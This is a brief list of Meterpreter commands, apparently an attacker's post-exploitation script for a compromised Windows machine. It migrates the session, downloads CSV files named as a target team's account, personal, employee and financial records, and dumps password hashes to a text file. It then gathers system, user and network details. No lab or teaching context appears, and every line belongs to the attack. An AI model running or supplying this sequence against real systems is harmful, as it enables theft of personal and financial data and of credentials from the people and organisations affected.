run post/windows/manage/migrate
download C:\\TeamXAccount.csv
download C:\\TeamXPersonal.csv
download C:\\TeamXEmployees.csv
download C:\\TeamXFinancial.csv
run post/windows/gather/hashdump > teamXpasswords.txt 
sysinfo
getuid
ifconfig